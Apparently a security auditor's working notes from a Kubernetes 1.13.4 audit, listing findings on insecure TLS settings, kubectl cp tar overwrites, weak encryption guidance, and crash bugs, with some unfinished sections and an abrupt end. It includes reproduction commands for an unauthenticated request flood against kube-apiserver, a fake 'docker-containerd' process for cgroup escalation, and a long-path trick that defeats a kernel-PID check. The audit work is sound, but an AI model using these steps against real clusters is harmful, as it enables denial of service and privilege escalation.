func (a *TokenAuthenticator) AuthenticateToken(ctx context.Context, value string) (*authenticator.Response, bool, error) {
user, ok := a.tokens[value]
if !ok {
return nil, false, nil
}
return &authenticator.Response{User: user}, true, nil
}
Seriously, we should check the various user-agent-building code...
By making excessive unauthenticated requests to exposed kube-apiserver HTTP interfaces, it is possible to consume excessive system resources (CPU). For example, while monitoring the kubernetes host's system usage, the kube-apiserver was seen utilizing 110-120% CPU:
Deploy a pod within the kubernetes cluster, then utilize xargs and curl to make many simultaneous requests to the kube-apiserver:
root@ubuntu-test-1:/# for i in $(seq 25); do head /dev/urandom | tr -dc A-Za-z0-9 | head -c 1000 >> list; echo "" >> list; done
root@ubuntu-test-1:/# while true; do xargs -a list -I{} -P20 curl -k https://172.17.0.4:6443/api/{}; done
A malicious user executing on a kubernetes pod makes excessive unauthenticated requests against the kube-apiserver endpoint as outlined in the reproduction steps.
The kubernetes cluster can utilize iptables rules to rate limit connections to this service, for example via the recent module's --seconds and --update options. It may be difficult to find a system-wide setting that would be acceptable for these rules; however, runtime tuning of these rules could be carried out by reacting to application feedback, e.g. triggering a rate limit when a pod within the cluster has reached a configured threshold of requests resulting in a 403 or 404.
There are many places that use InsecureSkipVerify: true
- https://golang.org/pkg/crypto/tls/:
// InsecureSkipVerify controls whether a client verifies the
// server's certificate chain and host name.
// If InsecureSkipVerify is true, TLS accepts any certificate
// presented by the server and any host name in that certificate.
// In this mode, TLS is susceptible to man-in-the-middle attacks.
// This should be used only for testing.
InsecureSkipVerify bool
Some of those insecure connections might not leave the current node, so maybe those are fine? Guess we need to check it on a multi-node cluster, maybe with wireshark, maybe by setting up a proxy and changing the certs.
src/kubernetes-1.13.4/cmd/kube-apiserver/app/server.go:260 (https://github.com/trailofbits/audit-kubernetes/blob/master/src/kubernetes-1.13.4/cmd/kube-apiserver/app/server.go#L260-L266):
// Proxying to pods and services is IP-based... don't expect to be able to verify the hostname
proxyTLSClientConfig := &tls.Config{InsecureSkipVerify: true}
proxyTransport := utilnet.SetTransportDefaults(&http.Transport{
DialContext: proxyDialerFn,
TLSClientConfig: proxyTLSClientConfig,
})
return nodeTunneler, proxyTransport, nil
This is called in:
// CreateServerChain creates the apiservers connected via delegation.
func CreateServerChain(completedOptions completedServerRunOptions, stopCh <-chan struct{}) (*genericapiserver.GenericAPIServer, error) {
So it seems that if a Kubernetes cluster has multiple kube-apiservers (needed e.g. for high availability), they connect to each other without really checking certificates?
// New creates Prober that will skip TLS verification while probing.
func New() Prober {
tlsConfig := &tls.Config{InsecureSkipVerify: true}
return NewWithTLSConfig(tlsConfig)
}
func (l *SSHTunnelList) healthCheck(e sshTunnelEntry) error {
// GET the healthcheck path using the provided tunnel's dial function.
transport := utilnet.SetTransportDefaults(&http.Transport{
DialContext: e.Tunnel.Dial,
// TODO(cjcullen): Plumb real TLS options through.
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
// We don't reuse the clients, so disable the keep-alive to properly
// close the connection.
DisableKeepAlives: true,
})
client := &http.Client{Transport: transport}
resp, err := client.Get(l.healthCheckURL.String())
if err != nil {
return err
}
resp.Body.Close()
return nil
}
src/kubernetes-1.13.4/staging/src/k8s.io/apimachinery/pkg/util/proxy/dial.go:58, in DialURL - although they warn about it:

if dialer != nil {
// We have a dialer; use it to open the connection, then
// create a tls client using the connection.
netConn, err := dialer(ctx, "tcp", dialAddr)
if err != nil {
return nil, err
}
if tlsConfig == nil {
// tls.Client requires non-nil config
klog.Warningf("using custom dialer with no TLSClientConfig. Defaulting to InsecureSkipVerify")
// tls.Handshake() requires ServerName or InsecureSkipVerify
tlsConfig = &tls.Config{
InsecureSkipVerify: true,
}
src/kubernetes-1.13.4/staging/src/k8s.io/apiserver/pkg/server/storage/storage_factory.go:290:

// Backends returns all backends for all registered storage destinations.
// Used for getting all instances for health validations.
func (s *DefaultStorageFactory) Backends() []Backend {
servers := sets.NewString(s.StorageConfig.ServerList...)
for _, overrides := range s.Overrides {
servers.Insert(overrides.etcdLocation...)
}
tlsConfig := &tls.Config{
InsecureSkipVerify: true,
}
src/kubernetes-1.13.4/staging/src/k8s.io/kube-aggregator/pkg/controllers/status/available_controller.go:99:

// construct an http client that will ignore TLS verification (if someone owns the network and messes with your status
// that's not so bad) and sets a very short timeout.
discoveryClient := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
// the request should happen quickly.
Timeout: 5 * time.Second,
}
src/minikube-0.35.0/pkg/minikube/bootstrapper/kubeadm/kubeadm.go:123:

func (k *KubeadmBootstrapper) GetApiServerStatus(ip net.IP) (string, error) {
url := fmt.Sprintf("https://%s:%d/healthz", ip, util.APIServerPort)
// To avoid: x509: certificate signed by unknown authority
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
When kubelet is running and the Docker engine is used as the container runtime, the dockershim container manager (pkg/kubelet/dockershim/cm/container_manager_linux.go) ensures every 5 minutes that the docker and docker-containerd processes are in the manager's cgroup.
This action is scheduled every 5 minutes when dockershim container manager is started:
func (m *containerManager) Start() error {
// TODO: check if the required cgroups are mounted.
if len(m.cgroupsName) != 0 {
manager, err := createCgroupManager(m.cgroupsName)
if err != nil {
return err
}
m.cgroupsManager = manager
}
go wait.Until(m.doWork, 5*time.Minute, wait.NeverStop)
return nil
}
And doWork calls EnsureDockerInContainer - note that by "container" we mean a cgroup here:
func (m *containerManager) doWork() {
// (...)
// EnsureDockerInContainer does two things.
// 1. Ensure processes run in the cgroups if m.cgroupsManager is not nil.
// 2. Ensure processes have the OOM score applied.
if err := kubecm.EnsureDockerInContainer(version, dockerOOMScoreAdj, m.cgroupsManager); err != nil {
klog.Errorf("Unable to ensure the docker processes run in the desired containers: %v", err)
}
}
This function (EnsureDockerInContainer, defined in pkg/kubelet/cm/container_manager_linux.go:711) gets the PIDs of all docker and docker-containerd processes using getPidsForProcess. It does this by first trying to read the PID from a hardcoded pidfile:
- "/var/run/docker.pid" for docker
- "/run/docker/libcontainerd/docker-containerd.pid" for docker-containerd
If the pidfile is missing, it falls back to procfs.PidOf, which finds the process by iterating over all processes in /proc and matching a regular expression against the name retrieved from /proc/<pid>/cmdline. The problem occurs in this fallback, as any user can spawn a process with the given name.
TODO FIXME: write the rest of it
The hardcoded pidfile /run/docker/libcontainerd/docker-containerd.pid was not present on the test system - the attack works only on systems where it is missing. A fake docker-containerd process is then moved into the /systemd/system.slice cgroup for certain resources:

vagrant@k8s-2:~$ sudo cat "/run/docker/libcontainerd/docker-containerd.pid"
cat: /run/docker/libcontainerd/docker-containerd.pid: No such file or directory
vagrant@k8s-2:~$ cp /bin/bash ./docker-containerd
vagrant@k8s-2:~$ ./docker-containerd
vagrant@k8s-2:~$ date
Fri Apr 5 08:03:37 PDT 2019
vagrant@k8s-2:~$ cat /proc/$$/cgroup
12:freezer:/
11:cpuset:/
10:blkio:/user.slice
9:net_cls,net_prio:/
8:perf_event:/
7:cpu,cpuacct:/user.slice
6:hugetlb:/
5:rdma:/
4:devices:/user.slice
3:pids:/user.slice/user-1000.slice/session-9.scope
2:memory:/user.slice
1:name=systemd:/user.slice/user-1000.slice/session-9.scope
0::/user.slice/user-1000.slice/session-9.scope
vagrant@k8s-2:~$ date
Fri Apr 5 08:08:28 PDT 2019
vagrant@k8s-2:~$ cat /proc/$$/cgroup
12:freezer:/systemd/system.slice
11:cpuset:/systemd/system.slice
10:blkio:/systemd/system.slice
9:net_cls,net_prio:/systemd/system.slice
8:perf_event:/systemd/system.slice
7:cpu,cpuacct:/systemd/system.slice
6:hugetlb:/systemd/system.slice
5:rdma:/
4:devices:/systemd/system.slice
3:pids:/systemd/system.slice
2:memory:/systemd/system.slice
1:name=systemd:/systemd/system.slice
0::/user.slice/user-1000.slice/session-9.scope
So another attack here: spawn a root process named docker-containerd. As a result, the process is root and is in a cgroup that has more access, i.e. access to all devices. Since it is root, maybe it can privesc to root on the host? It might be blocked by AppArmor, but this has to be checked.
// rotateLatestLog rotates latest log without compression, so that container can still write
// and fluentd can finish reading.
func (c *containerLogManager) rotateLatestLog(id, log string) error {
timestamp := c.clock.Now().Format(timestampFormat)
rotated := fmt.Sprintf("%s.%s", log, timestamp)
if err := os.Rename(log, rotated); err != nil {
return fmt.Errorf("failed to rotate log %q to %q: %v", log, rotated, err)
}
if err := c.runtimeService.ReopenContainerLog(id); err != nil {
// Rename the rotated log back, so that we can try rotating it again
// next round.
// If kubelet gets restarted at this point, we'll lose original log.
if renameErr := os.Rename(rotated, log); renameErr != nil {
// This shouldn't happen.
// Report an error if this happens, because we will lose original
// log.
klog.Errorf("Failed to rename rotated log %q back to %q: %v, reopen container log error: %v", rotated, log, renameErr, err)
}
return fmt.Errorf("failed to reopen container log %q: %v", id, err)
}
return nil
}
// Try to unmount mounted directories under kubeadmconstants.KubeletRunDirectory in order to be able to remove the kubeadmconstants.KubeletRunDirectory directory later
fmt.Printf("[reset] unmounting mounted directories in %q\n", kubeadmconstants.KubeletRunDirectory)
umountDirsCmd := fmt.Sprintf("awk '$2 ~ path {print $2}' path=%s /proc/mounts | xargs -r umount", kubeadmconstants.KubeletRunDirectory)
klog.V(1).Infof("[reset] executing command %q", umountDirsCmd)
umountOutputBytes, err := exec.Command("sh", "-c", umountDirsCmd).Output()
This is just a code quality issue/info. In pkg/kubectl/cmd/util/editor/editor.go:163:
func tempFile(prefix, suffix string) (f *os.File, err error) {
dir := os.TempDir()
for i := 0; i < 10000; i++ {
name := filepath.Join(dir, prefix+randSeq(5)+suffix)
f, err = os.OpenFile(name, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600)
if os.IsExist(err) {
continue
}
break
}
return
}
This could just use https://golang.org/pkg/io/ioutil/#TempFile, which uses very similar code: https://golang.org/src/io/ioutil/tempfile.go
Btw, this is used in pkg/kubectl/cmd/util/editor/editor.go:143:
// LaunchTempFile reads the provided stream into a temporary file in the given directory
// and file prefix, and then invokes Launch with the path of that file. It will return
// the contents of the file after launch, any errors that occur, and the path of the
// temporary file so the caller can clean it up as needed.
func (e Editor) LaunchTempFile(prefix, suffix string, r io.Reader) ([]byte, string, error) {
f, err := tempFile(prefix, suffix)
if err != nil {
return nil, "", err
}
defer f.Close()
path := f.Name()
if _, err := io.Copy(f, r); err != nil {
os.Remove(path)
return nil, path, err
}
// This file descriptor needs to close so the next process (Launch) can claim it.
f.Close()
if err := e.Launch(path); err != nil {
return nil, path, err
}
bytes, err := ioutil.ReadFile(path)
return bytes, path, err
}
and while there is a race condition/TOCTOU between closing the file and later reopening it in the editor (fetched via the EDITOR or KUBE_EDITOR envvar):
// This file descriptor needs to close so the next process (Launch) can claim it.
f.Close()
if err := e.Launch(path); err != nil {
I believe it is a non-issue, as the file was created with 0600 permissions (so only its owner has read/write access).
We've seen many places where a raw path is accepted from a config file and written to; it would be easy to set the path to /root/.ssh/authorized_keys or similar.
// compressLog compresses a log to log.gz with gzip.
func (c *containerLogManager) compressLog(log string) error {
r, err := os.Open(log)
if err != nil {
return fmt.Errorf("failed to open log %q: %v", log, err)
}
defer r.Close()
tmpLog := log + tmpSuffix
f, err := os.OpenFile(tmpLog, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644)
if err != nil {
return fmt.Errorf("failed to create temporary log %q: %v", tmpLog, err)
}
defer func() {
// Best effort cleanup of tmpLog.
os.Remove(tmpLog)
}()
defer f.Close()
w := gzip.NewWriter(f)
defer w.Close()
if _, err := io.Copy(w, r); err != nil {
return fmt.Errorf("failed to compress %q to %q: %v", log, tmpLog, err)
}
compressedLog := log + compressSuffix
if err := os.Rename(tmpLog, compressedLog); err != nil {
return fmt.Errorf("failed to rename %q to %q: %v", tmpLog, compressedLog, err)
}
// Remove old log file.
if err := os.Remove(log); err != nil {
return fmt.Errorf("failed to remove log %q after compress: %v", log, err)
}
return nil
}
When faulting Kubelet with KRF, a hard crash was encountered.
E0320 19:31:54.493854 6450 fs.go:591] Failed to read from stdout for cmd [ionice -c3 nice -n 19 du -s /var/lib/docker/overlay2/bbfc9596c0b12fb31c70db5ffdb78f47af303247bea7b93eee2cbf9062e307d8/diff] - read |0: bad file descriptor
panic: runtime error: index out of range
goroutine 289 [running]:
k8s.io/kubernetes/vendor/github.com/google/cadvisor/fs.GetDirDiskUsage(0xc001192c60, 0x5e, 0x1bf08eb000, 0x1, 0x0, 0xc0011a7188)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/google/cadvisor/fs/fs.go:600 +0xa86
k8s.io/kubernetes/vendor/github.com/google/cadvisor/fs.(*RealFsInfo).GetDirDiskUsage(0xc000bdbb60, 0xc001192c60, 0x5e, 0x1bf08eb000, 0x0, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/google/cadvisor/fs/fs.go:565 +0x89
k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common.(*realFsHandler).update(0xc000ee7560, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common/fsHandler.go:82 +0x36a
k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common.(*realFsHandler).trackUsage(0xc000ee7560)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common/fsHandler.go:120 +0x13b
created by k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common.(*realFsHandler).Start
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common/fsHandler.go:142 +0x3f
This crash occurs due to improper error handling in the disk usage function GetDirDiskUsage.
func GetDirDiskUsage(dir string, timeout time.Duration) (uint64, error) {
if dir == "" {
return 0, fmt.Errorf("invalid directory")
}
cmd := exec.Command("ionice", "-c3", "nice", "-n", "19", "du", "-s", dir)
stdoutp, err := cmd.StdoutPipe()
if err != nil {
return 0, fmt.Errorf("failed to setup stdout for cmd %v - %v", cmd.Args, err)
}
stderrp, err := cmd.StderrPipe()
if err != nil {
return 0, fmt.Errorf("failed to setup stderr for cmd %v - %v", cmd.Args, err)
}
if err := cmd.Start(); err != nil {
return 0, fmt.Errorf("failed to exec du - %v", err)
}
timer := time.AfterFunc(timeout, func() {
klog.Warningf("Killing cmd %v due to timeout(%s)", cmd.Args, timeout.String())
cmd.Process.Kill()
})
stdoutb, souterr := ioutil.ReadAll(stdoutp)
if souterr != nil {
klog.Errorf("Failed to read from stdout for cmd %v - %v", cmd.Args, souterr)
}
stderrb, _ := ioutil.ReadAll(stderrp)
err = cmd.Wait()
timer.Stop()
if err != nil {
return 0, fmt.Errorf("du command failed on %s with output stdout: %s, stderr: %s - %v", dir, string(stdoutb), string(stderrb), err)
}
stdout := string(stdoutb)
usageInKb, err := strconv.ParseUint(strings.Fields(stdout)[0], 10, 64)
if err != nil {
return 0, fmt.Errorf("cannot parse 'du' output %s - %s", stdout, err)
}
return usageInKb * 1024, nil
}
Within this function, the ionice command is executed, and its standard output and standard error are read. When reading standard output, there is a lack of error handling: a read error is only logged, not acted upon.
stdoutb, souterr := ioutil.ReadAll(stdoutp)
if souterr != nil {
klog.Errorf("Failed to read from stdout for cmd %v - %v", cmd.Args, souterr)
}
Execution then continues after the error, with stdoutb being empty. This results in a panic later in the function, when an attempt is made to index the first field of stdout (the string conversion of stdoutb).
usageInKb, err := strconv.ParseUint(strings.Fields(stdout)[0], 10, 64)
WithInsecure - the gRPC connection to the CSI driver's unix socket is dialed with grpc.WithInsecure():
func newGrpcConn(addr csiAddr) (*grpc.ClientConn, error) {
network := "unix"
klog.V(4).Infof(log("creating new gRPC connection for [%s://%s]", network, addr))
return grpc.Dial(
string(addr),
grpc.WithInsecure(),
grpc.WithDialer(func(target string, timeout time.Duration) (net.Conn, error) {
return net.Dial(network, target)
}),
)
}
In pkg/kubelet/cm/container_manager_linux.go:869
:
// Determines whether the specified PID is a kernel PID.
func isKernelPid(pid int) bool {
// Kernel threads have no associated executable.
_, err := os.Readlink(fmt.Sprintf("/proc/%d/exe", pid))
return err != nil
}
This check is incorrect, as it treats any readlink error as meaning "kernel PID" rather than checking for the specific "no such file" error. It can easily be attacked by placing the binary at an arbitrarily long path, so that the readlink fails with ENAMETOOLONG. This can be tested with this simple Go program, compiled with go build is_kernel_pid.go:
package main
import (
"fmt"
"os"
)
func main() {
fmt.Printf("isKernelPid(os.GetPid()) = %v\n", isKernelPid(os.Getpid()))
}
// Determines whether the specified PID is a kernel PID.
func isKernelPid(pid int) bool {
// Kernel threads have no associated executable.
_, err := os.Readlink(fmt.Sprintf("/proc/%d/exe", pid))
return err != nil
}
And then triggering the attack by moving the resulting binary to an arbitrary long path - by executing this command many times:
mkdir `python -c 'print("A"*250)'` && mv ./is_kernel_pid ./AA* && cd ./AA*
and then executing the binary:
$ pwd
/home/dc/gohacks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$ ./is_kernel_pid
isKernelPid(os.GetPid()) = true
$ strace -e readlinkat ./is_kernel_pid
readlinkat(AT_FDCWD, "/proc/self/exe", 0xc420022080, 128) = -1 ENAMETOOLONG (File name too long)
readlinkat(AT_FDCWD, "/proc/6961/exe", 0xc420022100, 128) = -1 ENAMETOOLONG (File name too long)
isKernelPid(os.GetPid()) = true
There are things like:
pkg/controller/certificates/signer/cfssl_signer.go
79: strPassword := os.Getenv("CFSSL_CA_PK_PASSWORD")
Trusting the tar implementation within a pod for kubectl cp can lead to unexpected overwriting of files belonging to the user running the command.
Affected versions: 1.13.4, 1.13.5, 1.14.0
If we consider the following command being run:
$ kubectl cp kube-system/kube-scheduler-kind-control-plane:/var/log/log.txt .
We would expect either a single file named log.txt or an error. However, if the pod has a malicious tar implementation, the client can receive an arbitrary number of files that will be processed and can overwrite anything in the destination directory.
kubectl attempts some validation to ensure the contents do not escape the destination directory, which appears sufficient (once symlink bugs are resolved):
if !strings.HasPrefix(header.Name, prefix) {
return fmt.Errorf("tar contents corrupted")
}
Exploitation is difficult without specifying a target environment. On UNIX environments, files are created without executable permissions, so exploitation would require techniques like overwriting .profile
or similar if run from ~
.
On Windows environments, it could place a DLL in the current working directory (if using a destination of .
) which could enable potential DLL hijacking attacks. Even if a destination directory is provided, the attacker could place .LNK files and cause NetNTLM hashes to be sent to a remote server when that directory is browsed.
The Kubernetes docs give the following guidance regarding data storage and encryption
These recommendations are not accurate from a cryptographic perspective and may lead to users making unsafe choices both in Kubernetes and elsewhere.
The default encryption option for users should be Secretbox. It is both more secure and faster than AES-CBC. Users should be encouraged to use KMS whenever possible. We believe these should be the only two options users are given. AES-GCM is secure but, as the docs point out, requires frequent key rotation to avoid nonce reuse attacks. Finally, AES-CBC is vulnerable to padding oracle attacks and should be deprecated. While Kubernetes itself doesn't lend itself well to a padding oracle attack, recommending AES-CBC both spreads misconceptions about cryptographic security and promotes a strictly worse choice than Secretbox.
This issue was also discussed in kubernetes/kubernetes#73514.
We can start here, but I think more container-type stuff will fall out eventually.
File Perms
TLDR: There are two usages of ssh.InsecureIgnoreHostKey in Kubernetes and one in Minikube.
TODO:
So there is some option to tunnel apiserver-kubelet communication via ssh. Is it secure?
makeSSHTunnel (src/kubernetes-1.13.4/pkg/ssh/ssh.go:102) is called by NewSSHTunnelFromBytes and NewSSHTunnel.

func makeSSHTunnel(user string, signer ssh.Signer, host string) (*SSHTunnel, error) {
config := ssh.ClientConfig{
User: user,
Auth: []ssh.AuthMethod{ssh.PublicKeys(signer)},
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
}
NewSSHTunnelFromBytes is only called by pkg/ssh/ssh_test.go, so it is not interesting (I haven't analyzed it further) as it appears to be test-only. Let's analyze NewSSHTunnel:
func (*realTunnelCreator) NewSSHTunnel(user, keyFile, healthCheckURL string) (tunnel, error)
func NewSSHTunnelList(user, keyfile string, healthCheckURL *url.URL, stopChan chan struct{}) *SSHTunnelList
pkg/master/tunneler/ssh.go:135:

// Run establishes tunnel loops and returns
